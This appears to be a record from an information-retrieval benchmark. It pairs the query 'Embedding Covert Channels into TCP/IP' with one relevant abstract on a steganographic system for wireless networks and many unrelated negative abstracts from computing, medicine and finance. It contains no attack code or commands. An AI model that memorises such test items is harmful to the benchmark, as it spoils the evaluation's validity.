17ba8244a5585c6df1cd6687f4abbf40 | Embedding Covert Channels into TCP/IP | [
{
"docid": "7034be316fcc2862d896b51662939c40",
"text": "This article presents HICCUPS (HIdden Communication system for CorrUPted networkS), a steganographic system dedicated to shared medium networks including wireless local area networks. The novelty of HICCUPS is: usage of secure telecommunications network armed with cryptographic mechanisms to provide steganographic system and proposal of new protocol with bandwidth allocation based on corrupted frames. All functional parts of the system and possibility of its implementation in existing public networks are discussed. An example of implementation framework for wireless local area networks IEEE 802.11 is also presented.",
"title": ""
}
] | [
{
"docid": "236dcb6dd7e04c0600c2f0b90f94c5dd",
"text": "Main call for Cloud computing is that users only utilize what they required and only pay for what they really use. Mobile Cloud Computing refers to an infrastructure where data processing and storage can happen away from mobile device. Portio research estimates that mobile subscribers worldwide will reach 6.9 billion by the end of 2013 and 8 billion by the end of 2016. Ericsson also forecasts that mobile subscriptions will reach 9 billion by 2017. Due to increasing use of mobile devices the requirement of cloud computing in mobile devices arise, which gave birth to Mobile Cloud Computing. Mobile devices do not need to have large storage capacity and powerful CPU speed. Due to storing data on cloud there is an issue of data security. Because of the risk associated with data storage many IT professionals are not showing their interest towards Mobile Cloud Computing. To ensure the correctness of users' data in the cloud, we propose an effective mechanism with salient feature of data integrity and confidentiality. This paper proposed a mechanism which uses the concept of RSA algorithm, Hash function along with several cryptography tools to provide better security to the data stored on the mobile cloud.",
"title": ""
},
{
"docid": "dcf8fc03b228c9d7f715605f06d55ed7",
"text": "This paper presents an exploratory study in which a humanoid robot (MecWilly) acted as a partner to preschool children, helping them to learn English words. In order to use the Socio-Cognitive Conflict paradigm to induce the knowledge acquisition process, we designed a playful activity in which children worked in pairs with another child or with the humanoid robot on a word-picture association task involving fruit and vegetables. The analysis of the two experimental conditions (child-child and child-robot) demonstrates the effectiveness of Socio-Cognitive Conflict in improving the children’s learning of English. Furthermore, the analysis of children's performances as reported in this study appears to highlight the potential use of humanoid robots in the acquisition of English by young children.",
"title": ""
},
{
"docid": "3c38b800109f75a352d16da2ee35b8bb",
"text": "Recurrent neural networks (RNNs) have been widely used for processing sequential data. However, RNNs are commonly difficult to train due to the well-known gradient vanishing and exploding problems and hard to learn long-term patterns. Long short-term memory (LSTM) and gated recurrent unit (GRU) were developed to address these problems, but the use of hyperbolic tangent and the sigmoid action functions results in gradient decay over layers. Consequently, construction of an efficiently trainable deep network is challenging. In addition, all the neurons in an RNN layer are entangled together and their behaviour is hard to interpret. To address these problems, a new type of RNN, referred to as independently recurrent neural network (IndRNN), is proposed in this paper, where neurons in the same layer are independent of each other and they are connected across layers. We have shown that an IndRNN can be easily regulated to prevent the gradient exploding and vanishing problems while allowing the network to learn long-term dependencies. Moreover, an IndRNN can work with non-saturated activation functions such as relu (rectified linear unit) and be still trained robustly. Multiple IndRNNs can be stacked to construct a network that is deeper than the existing RNNs. Experimental results have shown that the proposed IndRNN is able to process very long sequences (over 5000 time steps), can be used to construct very deep networks (21 layers used in the experiment) and still be trained robustly. Better performances have been achieved on various tasks by using IndRNNs compared with the traditional RNN and LSTM.",
"title": ""
},
{
"docid": "7fefe01183ad6c9c897b83f9b9bbe5be",
"text": "The Pap smear test is a manual screening procedure that is used to detect precancerous changes in cervical cells based on color and shape properties of their nuclei and cytoplasms. Automating this procedure is still an open problem due to the complexities of cell structures. In this paper, we propose an unsupervised approach for the segmentation and classification of cervical cells. The segmentation process involves automatic thresholding to separate the cell regions from the background, a multi-scale hierarchical segmentation algorithm to partition these regions based on homogeneity and circularity, and a binary classifier to finalize the separation of nuclei from cytoplasm within the cell regions. Classification is posed as a grouping problem by ranking the cells based on their feature characteristics modeling abnormality degrees. The proposed procedure constructs a tree using hierarchical clustering, and then arranges the cells in a linear order by using an optimal leaf ordering algorithm that maximizes the similarity of adjacent leaves without any requirement for training examples or parameter adjustment. Performance evaluation using two data sets show the effectiveness of the proposed approach in images having inconsistent staining, poor contrast, and overlapping cells.",
"title": ""
},
{
"docid": "c8e34c208f11c367e1f131edaa549c20",
"text": "Recently one dimensional (1-D) nanostructured metal-oxides have attracted much attention because of their potential applications in gas sensors. 1-D nanostructured metal-oxides provide high surface to volume ratio, while maintaining good chemical and thermal stabilities with minimal power consumption and low weight. In recent years, various processing routes have been developed for the synthesis of 1-D nanostructured metal-oxides such as hydrothermal, ultrasonic irradiation, electrospinning, anodization, sol-gel, molten-salt, carbothermal reduction, solid-state chemical reaction, thermal evaporation, vapor-phase transport, aerosol, RF sputtering, molecular beam epitaxy, chemical vapor deposition, gas-phase assisted nanocarving, UV lithography and dry plasma etching. A variety of sensor fabrication processing routes have also been developed. Depending on the materials, morphology and fabrication process the performance of the sensor towards a specific gas shows a varying degree of success. This article reviews and evaluates the performance of 1-D nanostructured metal-oxide gas sensors based on ZnO, SnO(2), TiO(2), In(2)O(3), WO(x), AgVO(3), CdO, MoO(3), CuO, TeO(2) and Fe(2)O(3). Advantages and disadvantages of each sensor are summarized, along with the associated sensing mechanism. Finally, the article concludes with some future directions of research.",
"title": ""
},
{
"docid": "27dff3b0339eacbdc3ab3ad8d16598ca",
"text": "In this paper we show a low cost and environmentally friendly fabrication for an agricultural sensing application. An antenna, a soil moisture sensor, and a leaf wetness sensor are inkjet-printed on paper substrate. A microprocessor attached to the paper substrate is capable of detecting the capacitance change on the surface of the sensor, and report the data over the wireless communication interface. This sensing system is useful to optimize irrigation systems.",
"title": ""
},
{
"docid": "e3b707ad340b190393d3384a1a364e63",
"text": "ed Log Lines Categorize Bins Figure 3. High-level overview of our approach for abstracting execution logs to execution events. Table III. Log lines used as a running example to explain our approach. 1. Start check out 2. Paid for, item=bag, quality=1, amount=100 3. Paid for, item=book, quality=3, amount=150 4. Check out, total amount is 250 5. Check out done Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr AN AUTOMATED APPROACH FOR ABSTRACTING EXECUTION LOGS 257 Table IV. Running example logs after the anonymize step. 1. Start check out 2. Paid for, item=$v, quality=$v, amount=$v 3. Paid for, item=$v, quality=$v, amount=$v 4. Check out, total amount=$v 5. Check out done Table V. Running example logs after the tokenize step. Bin names (no. of words, no. of parameters) Log lines (3,0) 1. Start check out 5. Check out done (5,1) 4. Check out, total amount=$v (8,3) 2. Paid for, item=$v, quality=$v, amount=$v 3. Paid for, item=$v, quality=$v, amount=$v 4.2.2. The tokenize step The tokenize step separates the anonymized log lines into different groups (i.e., bins) according to the number of words and estimated parameters in each log line. The use of multiple bins limits the search space of the following step (i.e., the categorize step). The use of bins permits us to process large log files in a timely fashion using a limited memory footprint since the analysis is done per bin instead of having to load up all the lines in the log file. We estimate the number of parameters in a log line by counting the number of generic terms (i.e., $v). Log lines with the same number of tokens and parameters are placed in the same bin. Table V shows the sample log lines after the anonymize and tokenize steps. The left column indicates the name of a bin. Each bin is named with a tuple: number of words and number of parameters that are contained in the log line associated with that bin. The right column in Table VI shows the log lines. Each row shows the bin and its corresponding log lines. The second and the third log lines contain 8 words and are likely to contain 3 parameters. Thus, the second and third log lines are grouped together in the (8,3) bin. Similarly, the first and last log lines are grouped together in the (3,0) bin since they both contain 3 words and are likely to contain no parameters. 4.2.3. The categorize step The categorize step compares log lines in each bin and abstracts them to the corresponding execution events. The inferred execution events are stored in an execution events database for future references. The algorithm used in the categorize step is shown below. Our algorithm goes through the log lines Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr 258 Z. M. JIANG ET AL. Table VI. Running example logs after the categorize step. Execution events (word parameter id) Log lines 3 0 1 1. Start check out 3 0 2 5. Check out done 5 1 1 4. Check out, total amount=$v 8 3 1 2. Paid for, item=$v, quality=$v, amount=$v 8 3 1 3. Paid for, item=$v, quality=$v, amount=$v bin by bin. After this step, each log line should be abstracted to an execution event. Table VI shows the results of our working example after the categorize step. 
for each bin bi for each log line lk in bin bi for each execution event e(bi , j) corresponding to bi in the events DB perform word by word comparison between e(bi , j) and lk if (there is no difference) then lk is of type e(bi , j) break end if end for // advance to next e(bi , j) if ( lk does not have a matching execution event) then lk is a new execution event store an abstracted lk into the execution events DB end if end for // advance to the next log line end for // advance to the next bin We now explain our algorithm using the running example. Our algorithm starts with the (3,0) bin. Initially, there are no execution events that correspond to this bin yet. Therefore, the execution event corresponding to the first log line becomes the first execution event namely 3 0 1. The 1 at the end of 3 0 1 indicates that this is the first execution event to correspond to the bin, which has 3 words and no parameters (i.e., bin 3 0). Then the algorithm moves to the next log line in the (3,0) bin, which contains the fifth log line. The algorithm compares the fifth log line with all the existing execution events in the (3,0) bin. Currently, there is only one execution event: 3 0 1. As the fifth log line is not similar to the 3 0 1 execution event, we create a new execution event 3 0 2 for the fifth log line. With all the log lines in the (3,0) bin processed, we can move on to the (5,1) bin. As there are no execution events that correspond to the (5,1) bin initially, the fourth log line gets assigned to a new execution event 5 1 1. Finally, we move on to the (8,3) bin. First, the second log line gets assigned with a new execution event 8 3 1 since there are no execution events corresponding to this bin yet. As the third log line is the same as the second log line (after the anonymize step), the third log line is categorized as the same execution event as the second log Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr AN AUTOMATED APPROACH FOR ABSTRACTING EXECUTION LOGS 259 line. Table VI shows the sample log lines after the categorize step. The left column is the abstracted execution event. The right column shows the line number together with the corresponding log lines. 4.2.4. The reconcile step Since the anonymize step uses heuristics to identify dynamic information in a log line, there is a chance that we might miss to anonymize some dynamic information. The missed dynamic information will result in the abstraction of several log lines to several execution events that are very similar. Table VII shows an example of dynamic information that was missed by the anonymize step. The table shows five different execution events. However, the user names after ‘for user’ are dynamic information and should have been replaced by the generic token ‘$v’. All the log lines shown in Table VII should have been abstracted to the same execution event after the categorize step. The reconcile step addresses this situation. All execution events are re-examined to identify which ones are to be merged. Execution events are merged if: 1. They belong to the same bin. 2. They differ from each other by one token at the same positions. 3. There exists a few of such execution events. We used a threshold of five events in our case studies. Other values are possibly based on the content of the analyzed log files. The threshold prevents the merging of similar yet different execution events, such as ‘Start processing’ and ‘Stop processing’, which should not be merged. 
Looking at the execution events in Table VII, we note that they all belong to the ‘5 0’ bin and differ from each other only in the last token. Since there are five of such events, we merged them into one event. Table VIII shows the execution events from Table VII after the reconcile step. Note that if the ‘5 0’ bin contains another execution event: ‘Stop processing for user John’; it will not be merged with the above execution events since it differs by two tokens instead of only the last token. Table VII. Sample logs that the categorize step would fail to abstract. Event IDs Execution events 5 0 1 Start processing for user Jen 5 0 2 Start processing for user Tom 5 0 3 Start processing for user Henry 5 0 4 Start processing for user Jack 5 0 5 Start processing for user Peter Table VIII. Sample logs after the reconcile step. Event IDs Execution events 5 0 1 Start processing for user $v Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr 260 Z. M. JIANG ET AL.",
"title": ""
},
{
"docid": "829064562b2070d532b3bf108adb0ea2",
"text": "The design of power semiconductor chips has always involved a trade-off between switching speed, static losses, safe operating area and short-circuit withstanding capability. This paper presents an optimized structure for 1200 V IGBTs from the viewpoint of all-round performance. The new device is based on a novel wide cell pitch carrier stored trench bipolar transistor (CSTBT). Unlike conventional trench gate IGBTs, this structure simultaneously achieves both low on-state voltage and the rugged short-circuit capability desired for industrial applications.",
"title": ""
},
{
"docid": "090f7194e7d1ae2bb28a472634ae4733",
"text": "Large-scale surveys of single-cell gene expression have the potential to reveal rare cell populations and lineage relationships but require efficient methods for cell capture and mRNA sequencing. Although cellular barcoding strategies allow parallel sequencing of single cells at ultra-low depths, the limitations of shallow sequencing have not been investigated directly. By capturing 301 single cells from 11 populations using microfluidics and analyzing single-cell transcriptomes across downsampled sequencing depths, we demonstrate that shallow single-cell mRNA sequencing (∼50,000 reads per cell) is sufficient for unbiased cell-type classification and biomarker identification. In the developing cortex, we identify diverse cell types, including multiple progenitor and neuronal subtypes, and we identify EGR1 and FOS as previously unreported candidate targets of Notch signaling in human but not mouse radial glia. Our strategy establishes an efficient method for unbiased analysis and comparison of cell populations from heterogeneous tissue by microfluidic single-cell capture and low-coverage sequencing of many cells.",
"title": ""
},
{
"docid": "610fc1b5ddfe81b338ee322e95e32f72",
"text": "The automated building detection in aerial images is a fundamental problem encountered in aerial and satellite images analysis. Recently, thanks to the advances in feature descriptions, Region-based CNN model (R-CNN) for object detection is receiving an increasing attention. Despite the excellent performance in object detection, it is problematic to directly leverage the features of R-CNN model for building detection in single aerial image. As we know, the single aerial image is in vertical view and the buildings possess significant directional feature. However, in R-CNN model, direction of the building is ignored and the detection results are represented by horizontal rectangles. For this reason, the detection results with horizontal rectangle cannot describe the building precisely. To address this problem, in this paper, we proposed a novel model with a key feature related to orientation, namely, Oriented R-CNN (OR-CNN). Our contributions are mainly in the following two aspects: 1) Introducing a new oriented layer network for detecting the rotation angle of building on the basis of the successful VGG-net R-CNN model; 2) the oriented rectangle is proposed to leverage the powerful R-CNN for remote-sensing building detection. In experiments, we establish a complete and bran-new data set for training our oriented R-CNN model and comprehensively evaluate the proposed method on a publicly available building detection data set. We demonstrate State-of-the-art results compared with the previous baseline methods.",
"title": ""
},
{
"docid": "733ddc5a642327364c2bccb6b1258fac",
"text": "Human memory is unquestionably a vital cognitive ability but one that can often be unreliable. External memory aids such as diaries, photos, alarms and calendars are often employed to assist in remembering important events in our past and future. The recent trend for lifelogging, continuously documenting ones life through wearable sensors and cameras, presents a clear opportunity to augment human memory beyond simple reminders and actually improve its capacity to remember. This article surveys work from the fields of computer science and psychology to understand the potential for such augmentation, the technologies necessary for realising this opportunity and to investigate what the possible benefits and ethical pitfalls of using such technology might be.",
"title": ""
},
{
"docid": "8ec018e0fc4ca7220387854bdd034a58",
"text": "Despite the overwhelming success of deep learning in various speech processing tasks, the problem of separating simultaneous speakers in a mixture remains challenging. Two major difficulties in such systems are the arbitrary source permutation and unknown number of sources in the mixture. We propose a novel deep learning framework for single channel speech separation by creating attractor points in high dimensional embedding space of the acoustic signals which pull together the time-frequency bins corresponding to each source. Attractor points in this study are created by finding the centroids of the sources in the embedding space, which are subsequently used to determine the similarity of each bin in the mixture to each source. The network is then trained to minimize the reconstruction error of each source by optimizing the embeddings. The proposed model is different from prior works in that it implements an end-to-end training, and it does not depend on the number of sources in the mixture. Two strategies are explored in the test time, K-means and fixed attractor points, where the latter requires no post-processing and can be implemented in real-time. We evaluated our system on Wall Street Journal dataset and show 5.49% improvement over the previous state-of-the-art methods.",
"title": ""
},
{
"docid": "6dfa3f106d58a7cb1ee136685e3ccc39",
"text": "BACKGROUND\nA short battery of physical performance tests was used to assess lower extremity function in more than 5,000 persons age 71 years and older in three communities.\n\n\nMETHODS\nBalance, gait, strength, and endurance were evaluated by examining ability to stand with the feet together in the side-by-side, semi-tandem, and tandem positions, time to walk 8 feet, and time to rise from a chair and return to the seated position 5 times.\n\n\nRESULTS\nA wide distribution of performance was observed for each test. Each test and a summary performance scale, created by summing categorical rankings of performance on each test, were strongly associated with self-report of disability. Both self-report items and performance tests were independent predictors of short-term mortality and nursing home admission in multivariate analyses. However, evidence is presented that the performance tests provide information not available from self-report items. Of particular importance is the finding that in those at the high end of the functional spectrum, who reported almost no disability, the performance test scores distinguished a gradient of risk for mortality and nursing home admission. Additionally, within subgroups with identical self-report profiles, there were systematic differences in physical performance related to age and sex.\n\n\nCONCLUSION\nThis study provides evidence that performance measures can validly characterize older persons across a broad spectrum of lower extremity function. Performance and self-report measures may complement each other in providing useful information about functional status.",
"title": ""
},
{
"docid": "df83f2aa0347bfb3131e8c53b805084b",
"text": "Spoken language interfaces are being incorporated into various devices such as smart phones and TVs. However, dialogue systems may fail to respond correctly when users' request functionality is not supported by currently installed apps. This paper proposes a feature-enriched matrix factorization (MF) approach to model open domain intents, which allows a system to dynamically add unexplored domains according to users' requests. First we leverage the structured knowledge from Wikipedia and Freebase to automatically acquire domain-related semantics to enrich features of input utterances, and then MF is applied to model automatically acquired knowledge, published app textual descriptions and users' spoken requests in a joint fashion; this generates latent feature vectors for utterances and user intents without need of prior annotations. Experiments show that the proposed MF models incorporated with rich features significantly improve intent prediction, achieving about 34% of mean average precision (MAP) for both ASR and manual transcripts.",
"title": ""
},
{
"docid": "002c7b0c2eec1bcef6efd149d241616e",
"text": "Despite all that has been done to promote Road Safety in India so far, there are always regions that fall prey to the vulnerabilities that linger on in every corner. The heterogeneity of these vulnerability-inducing causes leads to the need for an effective analysis so as to subdue the alarming figures by a significant amount. The objective of this paper is to have data mining to come to aid to create a model that not only smooths out the heterogeneity of the data by grouping similar objects together to find the accident prone areas in the country with respect to different accident-factors but also helps determine the association between these factors and casualties.",
"title": ""
},
{
"docid": "274829e884c6ba5f425efbdce7604108",
"text": "The Internet of Things (IoT) is constantly evolving and is giving unique solutions to the everyday problems faced by man. “Smart City” is one such implementation aimed at improving the lifestyle of human beings. One of the major hurdles in most cities is its solid waste management, and effective management of the solid waste produced becomes an integral part of a smart city. This paper aims at providing an IoT based architectural solution to tackle the problems faced by the present solid waste management system. By providing a complete IoT based system, the process of tracking, collecting, and managing the solid waste can be easily automated and monitored efficiently. By taking the example of the solid waste management crisis of Bengaluru city, India, we have come up with the overall system architecture and protocol stack to give a IoT based solution to improve the reliability and efficiency of the system. By making use of sensors, we collect data from the garbage bins and send them to a gateway using LoRa technology. The data from various garbage bins are collected by the gateway and sent to the cloud over the Internet using the MQTT (Message Queue Telemetry Transport) protocol. The main advantage of the proposed system is the use of LoRa technology for data communication which enables long distance data transmission along with low power consumption as compared to Wi-Fi, Bluetooth or Zigbee.",
"title": ""
},
{
"docid": "e006be5c04dfbb672eaac6cd41ead75c",
"text": "Current regulators for ac inverters are commonly categorized as hysteresis, linear PI, or deadbeat predictive regulators, with a further sub-classification into stationary ABC frame and synchronous – frame implementations. Synchronous frame regulators are generally accepted to have a better performance than stationary frame regulators, as they operate on dc quantities and hence can eliminate steady-state errors. This paper establishes a theoretical connection between these two classes of regulators and proposes a new type of stationary frame regulator, the P+Resonant regulator, which achieves the same transient and steady-state performance as a synchronous frame PI regulator. The new regulator is applicable to both single-phase and three phase inverters.",
"title": ""
},
{
"docid": "d1ff3f763fac877350d402402b29323c",
"text": "The study of microstrip patch antennas has made great progress in recent years. Compared with conventional antennas, microstrip patch antennas have more advantages and better prospects. They are lighter in weight, low volume, low cost, low profile, smaller in dimension and ease of fabrication and conformity. Moreover, the microstrip patch antennas can provide dual and circular polarizations, dual-frequency operation, frequency agility, broad band-width, feedline flexibility, beam scanning omnidirectional patterning. In this paper we discuss the microstrip antenna, types of microstrip antenna, feeding techniques and application of microstrip patch antenna with their advantage and disadvantages over conventional microwave antennas.",
"title": ""
},
{
"docid": "90b502cb72488529ec0d389ca99b57b8",
"text": "The cross-entropy loss commonly used in deep learning is closely related to the defining properties of optimal representations, but does not enforce some of the key properties. We show that this can be solved by adding a regularization term, which is in turn related to injecting multiplicative noise in the activations of a Deep Neural Network, a special case of which is the common practice of dropout. We show that our regularized loss function can be efficiently minimized using Information Dropout, a generalization of dropout rooted in information theoretic principles that automatically adapts to the data and can better exploit architectures of limited capacity. When the task is the reconstruction of the input, we show that our loss function yields a Variational Autoencoder as a special case, thus providing a link between representation learning, information theory and variational inference. Finally, we prove that we can promote the creation of optimal disentangled representations simply by enforcing a factorized prior, a fact that has been observed empirically in recent work. Our experiments validate the theoretical intuitions behind our method, and we find that Information Dropout achieves a comparable or better generalization performance than binary dropout, especially on smaller models, since it can automatically adapt the noise to the structure of the network, as well as to the test sample.",
"title": ""
},
{
"docid": "e0ffd8055600c38f59fec4f702c0a8ec",
"text": "Requirements Engineering is one of the most vital activities in the entire Software Development Life Cycle. The success of the software is largely dependent on how well the users' requirements have been understood and converted into appropriate functionalities in the software. Typically, the users convey their requirements in natural language statements that initially appear easy to state. However, being stated in natural language, the statement of requirements often tends to suffer from misinterpretations and imprecise inferences. As a result, the requirements specified thus, may lead to ambiguities in the software specifications. One can indeed find numerous approaches that deal with ensuring precise requirement specifications. Naturally, an obvious approach to deal with ambiguities in natural language software specifications is to eliminate ambiguities altogether i.e. to use formal specifications. However, the formal methods have been observed to be cost-effective largely for the development of mission-critical software. Due to the technical sophistication required, these are yet to be accepted in the mainstream. Hence, the other alternative is to let the ambiguities exist in the natural language requirements but deal with the same using proven techniques viz. using approaches based on machine learning, knowledge and ontology to resolve them. One can indeed find numerous automated and semi-automated tools to resolve specific types of natural language software requirement ambiguities. However, to the best of our knowledge there is no published literature that attempts to compare and contrast the prevalent approaches to deal with ambiguities in natural language software requirements. Hence, in this paper, we attempt to survey and analyze the prevalent approaches that attempt to resolve ambiguities in natural language software requirements. We focus on presenting a state-of-the-art survey of the currently available tools for ambiguity resolution. The objective of this paper is to disseminate, dissect and analyze the research work published in the area, identify metrics for a comparative evaluation and eventually do the same. At the end, we identify open research issues with an aim to spark new interests and developments in this field.",
"title": ""
}
] | scidocsrr |
04460e92b760064c035e507573220270 | Performance comparison of the RPL and LOADng routing protocols in a Home Automation scenario | [
{
"docid": "a231d6254a136a40625728d7e14d7844",
"text": "This document specifies an Internet standards track protocol for the Internet community, and requests discussion and suggestions for improvements. Please refer to the current edition of the \"Internet Official Protocol Standards\" (STD 1) for the standardization state and status of this protocol. Distribution of this memo is unlimited. Abstract This document describes the frame format for transmission of IPv6 packets and the method of forming IPv6 link-local addresses and statelessly autoconfigured addresses on IEEE 802.15.4 networks. Additional specifications include a simple header compression scheme using shared context and provisions for packet delivery in IEEE 802.15.4 meshes.",
"title": ""
}
] | [
{
"docid": "2377b7926cebeee93a92eb03e71e77d2",
"text": "Electronic commerce has enabled a number of online pay-for-answer services. However, despite commercial interest, we still lack a comprehensive understanding of how financial incentives support question asking and answering. Using 800 questions randomly selected from a pay-for-answer site, along with site usage statistics, we examined what factors impact askers' decisions to pay. We also explored how financial rewards affect answers, and if question pricing can help organize Q&A exchanges for archival purposes. We found that askers' decisions are two-part--whether or not to pay and how much to pay. Askers are more likely to pay when requesting facts and will pay more when questions are more difficult. On the answer side, our results support prior findings that paying more may elicit a higher number of answers and answers that are longer, but may not elicit higher quality answers (as rated by the askers). Finally, we present evidence that questions with higher rewards have higher archival value, which suggests that pricing can be used to support archival use.",
"title": ""
},
{
"docid": "02d65cf36a3216b28a88b9077ff14e2a",
"text": "Suction cups have long been used as a means to grasp and manipulate objects. They enable active control of grasp, enhance grasp stability, and handle some objects such as large flat plates more easily than standard graspers. However, the application of suction cups to object manipulation has been confined to a relatively small, well-defined problem set. Their potential for grasping a large range of unknown objects remains relatively unexplored. This seems in part due to the complexity involved with the design and fabrication of various materials comprising the grasper as well as actuators used to enable grasping. This paper introduces the design of a suction cup that is “self-selecting.” In other words, the suction cups comprising the grasper do not exert any suction force when the cup(s) are not in contact with the object, but instead exert a suction force only when they are in physical contact with the object. Since grasping is achieved purely by passive means, the cost and weight associated with individual sensors, valves, and/or actuators are essentially eliminated. Furthermore, the design permits the use of a central vacuum pump, thereby maximizing the suction force on an object and enabling some suction on surfaces that may prohibit tight seals. This paper presents the design, analysis, fabrication, and experimental results of such a “self-selecting” suction cup array.",
"title": ""
},
{
"docid": "c42b336a93025547219bac220c7e81c5",
"text": "OBJECTIVE\nThe purpose of this study was to establish outcome measures for professionalism in medical students and to identify predictors of these outcomes.\n\n\nDESIGN\nRetrospective cohort study.\n\n\nSETTING\nA US medical school.\n\n\nPARTICIPANTS\nAll students entering in 1995 and graduating within 5 years.\n\n\nMEASURES\nOutcome measures included review board identification of professionalism problems and clerkship evaluations for items pertaining to professionalism. Pre-clinical predictor variables included material from the admissions application, completion of required course evaluations, students' self-reporting of immunisation compliance, students' performance on standardised patient (SP) exercises, and students' self-assessed performance on SP exercises.\n\n\nRESULTS\nThe outcome measures of clerkship professionalism scores were found to be highly reliable (alpha 0.88-0.96). No data from the admissions material was found to be predictive of professional behaviour in the clinical years. Using multivariate regression, failing to complete required course evaluations (B = 0.23) and failing to report immunisation compliance (B = 0.29) were significant predictors of unprofessional behaviour found by the review board in subsequent years. Immunisation non-compliance predicted low overall clerkship professional evaluation scores (B = - 0.34). Student self-assessment accuracy (SP score minus self-assessed score) (B = 0.03) and immunisation non-compliance (B = 0.54) predicted the internal medicine clerkship professionalism score.\n\n\nCONCLUSIONS\nThis study identifies a set of reliable, context-bound outcome measures in professionalism. Although we searched for predictors of behaviour in the admissions application and other domains commonly felt to be predictive of professionalism, we found significant predictors only in domains where students had had opportunities to demonstrate conscientious behaviour or humility in self-assessment.",
"title": ""
},
{
"docid": "57227cc2400f478671e2877feee3f835",
"text": "Internet of Things (IoT) has been proposed to be a new paradigm of connecting devices and providing services to various applications, e.g., transportation, energy, smart cities, and health care. In this paper we focus on an important issue, i.e., the economics of IoT, that can have a great impact on the success of IoT applications. In particular, we adopt and present the information economics approach with its applications in IoT. We first review existing economic models developed for IoT services. Then we outline two important topics of information economics that are pertinent to IoT, i.e., the value of information and proper pricing of information. Finally, we propose a game theoretic model to study the price competition of IoT sensing services. Perspectives on future research directions to apply information economics to IoT are discussed.",
"title": ""
},
{
"docid": "3c3ae987e018322ca45b280c3d01eba8",
"text": "Boundary prediction in images as well as video has been a very active topic of research and organizing visual information into boundaries and segments is believed to be a corner stone of visual perception. While prior work has focused on predicting boundaries for observed frames, our work aims at predicting boundaries of future unobserved frames. This requires our model to learn about the fate of boundaries and extrapolate motion patterns. We experiment on established realworld video segmentation dataset, which provides a testbed for this new task. We show for the first time spatio-temporal boundary extrapolation in this challenging scenario. Furthermore, we show long-term prediction of boundaries in situations where the motion is governed by the laws of physics. We successfully predict boundaries in a billiard scenario without any assumptions of a strong parametric model or any object notion. We argue that our model has with minimalistic model assumptions derived a notion of “intuitive physics” that can be applied to novel scenes.",
"title": ""
},
{
"docid": "24d3e9a74e7bb6465e24e8ec2823f87e",
"text": "Software-Defined Networking (SDN) is now envisioned for Wide Area Networks (WAN) and deployed constrained networks. Such networks require a resilient, scalable and easily extensible SDN control plane. In this paper, we propose DISCO, a DIstributed SDN COntrol plane able to cope with the distributed and heterogeneous nature of modern overlay networks and deployed networks. A DISCO controller manages its own network domain, communicates with other DISCO controllers to provide end-to-end network services and share aggregated network-wide information. This east-west communication is based on a lightweight and highly manageable control channel which can self-adapt to network conditions.",
"title": ""
},
{
"docid": "cf248f6d767072a4569e31e49918dea1",
"text": "We describe resources aimed at increasing the usability of the semantic representations utilized within the DELPH-IN (Deep Linguistic Processing with HPSG) consortium. We concentrate in particular on the Dependency Minimal Recursion Semantics (DMRS) formalism, a graph-based representation designed for compositional semantic representation with deep grammars. Our main focus is on English, and specifically English Resource Semantics (ERS) as used in the English Resource Grammar. We first give an introduction to ERS and DMRS and a brief overview of some existing resources and then describe in detail a new repository which has been developed to simplify the use of ERS/DMRS. We explain a number of operations on DMRS graphs which our repository supports, with sketches of the algorithms, and illustrate how these operations can be exploited in application building. We believe that this work will aid researchers to exploit the rich and effective but complex DELPH-IN resources.",
"title": ""
},
{
"docid": "9f82843a9f3434ada3f60d09604b0afe",
"text": "The performance of pattern classifiers depends on the separability of the classes in the feature space - a property related to the quality of the descriptors - and the choice of informative training samples for user labeling - a procedure that usually requires active learning. This work is devoted to improve the quality of the descriptors when samples are superpixels from remote sensing images. We introduce a new scheme for superpixel description based on Bag of visual Words, which includes information from adjacent superpixels, and validate it by using two remote sensing images and several region descriptors as baselines.",
"title": ""
},
{
"docid": "47aee90be18e5f2b906d97c67f6016e7",
"text": "Embedded VLC (Visible Light Communication) has attracted significant research attention in recent years. A reliable and robust VLC system can become one of the IoT communication technologies for indoor environment. VLC could become a wireless technology complementary to existing RF-based technology but with no RF interference. However, existing low cost LED based VLC platforms have limited throughput and reliability. In this work, we introduce Purple VLC: a new embedded VLC platform that can achieve 100 kbps aggregate throughput at a distance of 6 meters, which is 6-7x improvement over state-of-the-art. Our design combines I/O offloading in computation, concurrent communication with polarized light, and full-duplexing to offer more than 99% link reliability at a distance of 6 meters.",
"title": ""
},
{
"docid": "7ca0ceb19e47f9848db1a5946c19d561",
"text": "This thesis performs an empirical analysis of Word2Vec by comparing its output to WordNet, a well-known, human-curated lexical database. It finds that Word2Vec tends to uncover more of certain types of semantic relations than others – with Word2Vec returning more hypernyms, synonomyns and hyponyms than hyponyms or holonyms. It also shows the probability that neighbors separated by a given cosine distance in Word2Vec are semantically related in WordNet. This result both adds to our understanding of the stillunknown Word2Vec and helps to benchmark new semantic tools built from word vectors. Word2Vec, Natural Language Processing, WordNet, Distributional Semantics",
"title": ""
},
{
"docid": "72e158d509f7f95eb0a3dcf699922be2",
"text": "We perform an asset market experiment in order to investigate whether overconfidence induces trading. We investigate three manifestations of overconfidence: calibration-based overconfidence, the better-than-average effect and illusion of control. Novelly, the measure employed for calibration-based overconfidence is task-specific in that it is designed to influence behavior. We find that calibration-based overconfidence does engender additional trade, though the better-than-average also appears to play a role. This is true both at the level of the individual and also at the level of the market. There is little evidence that gender influences trading activity. JEL Classification: G10, G11, G12, G14 The authors gratefully acknowledge the co-editor’s valuable suggestions in improving the paper’s exposition and two anonymous referrers’ valuable comments. In addition, the authors would like to thank the very helpful comments of Lucy Ackert, Ben Amoako-Adu, Bruno Biais, Tim Cason, Narat Charupat, Günter Franke, Simon Gervais, Markus Glaser, Patrik Guggenberger, Michael Haigh, Joachim Inkmann, Marhuenda Joaquin, Alexander Kempf, Brian Kluger, Roman Kraeussl, Bina Lehmann, Tao Lin, Harald Lohre, Greg Lypny, Elizabeth Maynes, Moshe Milevsky, Dean Mountain, Gordon Roberts, Chris Robinson, Stefan Rünzi, Gideon Saar, Dirk Schiereck, Harris Schlesinger, Chuck Schnitzlein, Michael Schröder, Betty Simkins, Brian Smith, Issouf Soumare, Yisong Tian, 